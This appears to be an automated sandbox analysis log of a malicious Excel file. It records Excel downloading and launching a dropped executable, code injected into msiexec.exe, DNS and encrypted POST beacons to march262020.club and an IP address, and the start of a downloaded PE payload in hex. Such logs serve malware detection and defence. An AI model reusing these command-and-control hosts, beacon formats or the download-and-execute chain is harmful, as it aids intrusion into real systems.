Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Jump to behavior |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 2_2_00428900 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then call 00419D40h | 2_2_00423380 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov esi, eax | 2_2_00424440 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 2_2_00423C00 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov byte ptr [edi], bl | 2_2_0041D660 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then cmp word ptr [eax], cx | 2_2_00426E00 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 2_2_0041EF50 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then cmp word ptr [eax], cx | 2_2_003E7050 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov byte ptr [edi], bl | 2_2_003DD8B0 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 2_2_003DF1A0 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 2_2_003E8B50 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then call 003D9F90h | 2_2_003E35D0 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 2_2_003E3E50 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov esi, eax | 2_2_003E4690 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 4_2_00098900 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then call 00089D40h | 4_2_00093380 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 4_2_00093C00 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then mov esi, eax | 4_2_00094440 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then cmp word ptr [eax], cx | 4_2_00096E00 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then mov byte ptr [edi], bl | 4_2_0008D660 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 4_2_0008EF50 |
Source: global traffic | DNS query: name: march262020.club |
Source: global traffic | TCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80 |
Source: global traffic | TCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80 |
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7 |
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.comContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 27 Mar 2020 17:30:37 GMTContent-Type: application/octet-streamContent-Length: 245248Connection: keep-aliveLast-Modified: Fri, 27 Mar 2020 15:28:13 GMTETag: "3be00-5a1d7bfe43d40"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 c4 7b 9f dc a5 15 cc dc a5 15 cc dc a5 15 cc c2 f7 91 cc c3 a5 15 cc c2 f7 80 cc fd a5 15 cc c2 f7 96 cc 5d a5 15 cc fb 63 6e cc db a5 15 cc dc a5 14 cc 58 a5 15 cc c2 f7 9f cc dd a5 15 cc c2 f7 81 cc dd a5 15 cc c2 f7 84 cc dd a5 15 cc 52 69 63 68 dc a5 15 cc 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 c4 19 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 02 00 00 c0 0b 00 00 00 00 00 6c 2c 00 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 0e 00 00 04 00 00 f6 50 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 28 03 00 50 00 00 00 00 30 0e 00 40 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 02 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 dc 02 00 00 10 00 00 00 de 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 43 00 00 00 f0 02 00 00 44 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 48 ee 0a 00 00 40 03 00 00 1a 00 00 00 26 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 7c 00 00 00 30 0e 00 00 7e 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |